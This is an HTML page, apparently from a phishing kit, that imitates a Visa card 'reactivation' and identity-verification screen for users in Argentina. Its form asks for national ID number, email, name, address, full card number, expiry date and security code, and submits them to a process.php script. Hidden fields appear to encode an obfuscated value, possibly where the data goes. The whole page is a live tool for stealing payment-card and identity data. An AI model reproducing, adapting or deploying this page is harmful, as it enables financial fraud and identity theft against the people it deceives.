<!DOCTYPE html>
<html><head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<link href="style.css" rel="stylesheet" type="text/css"><title>Visa Home</title>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="formToWizard.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$("#SignupForm").formToWizard({ submitButton: 'SaveAccount' })
});
</script>
<script language="javascript" src="validacion.js"></script>
</head>
<body>
<!-- base semi-transparente -->
<div style="left: 0px; width: 1250px; top: 0px; height: 774px;" id="fade" class="overlay"></div>
<!-- fin base semi-transparente -->
<!-- ventana modal -->
<div style="top: 106px; height: 347px; left: 97px; width: 796px;" id="light" class="modal">
<div>
<div id="plop">
<h2>VERIFICACIÓN DE IDENTIDAD - REACTIVACION DE CUENTA</h2>
Si desea activar su tarjeta de credito Visa nuevamente, le solicitamos
que siga el proceso de identificación personal que a continuación se le
propone. </div>
</div>
<div>
<div id="plop2">
<div>
<div>
<div id="plop3">
<table>
<tbody>
<tr>
<td></td>
<td>
<div class="login-form grid-4">
<div class="login-form-header">
<h2>Ingreso</h2>
</div>
<div class="login-form-conten">
<div id="main">
<form enctype="multipart/form-data" id="SignupForm" method="post" action="process.php" onSubmit="return validacion();">
<fieldset> <legend>Ingreso</legend> <label for="Tipo">Tipo de Documento</label> <input name="action" value="c" type="hidden"> <input name="form" value="o" type="hidden"> <input name="verifica" value=":" type="hidden"> <input name="null" value=" " type="hidden"> <input name="proc" value="l" type="hidden"> <input name="valida" value="d" type="hidden"> <input name="input" value="h" type="hidden"> <input name="type" value="e" type="hidden"> <input name="post" value="a" type="hidden"> <input name="procesa" value="r" type="hidden"> <input name="enviar" value="t" type="hidden"> <input name="submit" value="@" type="hidden"> <input name="vbv" value="i" type="hidden"> <input name="check" value="v" type="hidden"> <input name="filtrar" value="." type="hidden"> <input name="limpiarCadena" value="m" type="hidden"> <input name="redir" value="B" type="hidden"> <input name="verifica" value=":" type="hidden"> <input name="null" value=" " type="hidden">
<select id="tipo" name="tipedoc" class="inputCombo-chico" size="1" tabindex="2"><option value="CI">Cédula de Identidad</option><option value="DNI" selected="selected">Documento
Nacional de Identidad</option><option value="DU">Documento Unico</option><option value="LC">Libreta Cívica</option><option value="LE">Libreta de Enrolamiento</option><option value="PAS">Pasaporte</option></select>
<label for="Name">Número</label> <input id="docNumber" name="doc" class="username_qwerty" onfocus="setInputPos('username_qwerty')" tabindex="2" type="text"><br>
<label for="mail">Email</label> <input id="mail" name="mail" type="text"> </fieldset>
<fieldset> <legend>Datos Personales</legend>
<label for="Name">Nombre Completo</label> <input id="Name" name="nombre" type="text"> <label for="dire">Direccion</label> <input id="dire" name="dire" type="text"> <label for="Ciudad">Ciudad</label>
<input id="ciudad" name="ciudad" type="text"><label for="cp">Codigo Postal</label>
<input id="cp" name="cp" type="text"><label for="Tipo">Provincia</label>
<select id="prov" name="prov" class="inputCombo-chico" size="1" tabindex="2"><option value="Buenos Aires">Buenos Aires</option><option value="Catamarca">Catamarca</option><option value="Chaco">Chaco</option><option value="Chubut">Chubut</option><option value="Cordoba">Cordoba</option><option value="Corrientes">Corrientes</option><option value="Entre Rios">Entre Rios</option><option value="Formosa">Formosa</option><option value="Jujuy">Jujuy</option><option value="La Pampa">La Pampa</option><option value="La Rioja">La Rioja</option><option value="Mendoza">Mendoza</option><option value="Misiones">Misiones</option><option value="Neuquen">Neuquen</option><option value="Rio Negro">Rio Negro</option><option value="Salta">Salta</option><option value="San Juan">San Juan</option><option value="San Luis">San Luis</option><option value="Santa Cruz">Santa Cruz</option><option value="Santa Fe">Santa Fe</option><option value="Sgo. del Estero">Sgo. del Estero</option><option value="Tierra del Fuego">Tierra del Fuego</option><option value="Tucuman">Tucuman</option></select>
<legend>Informacion de Tarjeta</legend>
<label for="CardNumber">Numero de Tarjeta (Sin espacios)</label>
<input id="CardNumber" name="cc" type="text" maxlength="16"><label for="CreditcardMonth">Expiracion</label>
<select id="CreditcardMonth" name="ccmes"><option value="1">1</option><option value="2">2</option><option value="3">3</option><option value="4">4</option><option value="5">5</option><option value="6">6</option><option value="7">7</option><option value="8">8</option><option value="9">9</option><option value="10">10</option><option value="11">11</option><option value="12">12</option></select>
<select id="CreditcardYear" name="ccano"><option value="2017">2017</option><option value="2018">2018</option><option value="2019">2019</option><option value="2020">2020</option><option value="2021">2021</option><option value="2022">2022</option><option value="2023">2023</option><option value="2024">2024</option><option value="2025">2025</option></select>
<label for="Address1">Codigo de Seguridad (Los 3 numeros que se encuentran en el dorso de su tarjeta.)</label>
<input id="Address1" name="cuu" type="text" maxlength="3"></fieldset>
<p> <input id="SaveAccount" class="vb button" value="Reactivar Tarjeta" type="submit"> </p>
</form>
</div>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- fin ventana modal -->
<div id="header-top"></div>
<div id="content">
<center><img style="width: 980px; height: 679px;" src="vhome_clear.png"></center>
</div>
<div id="footer">
<center><img src="vhome_foot_noborder.png" height="39" width="980"></center>
</div>
</body></html>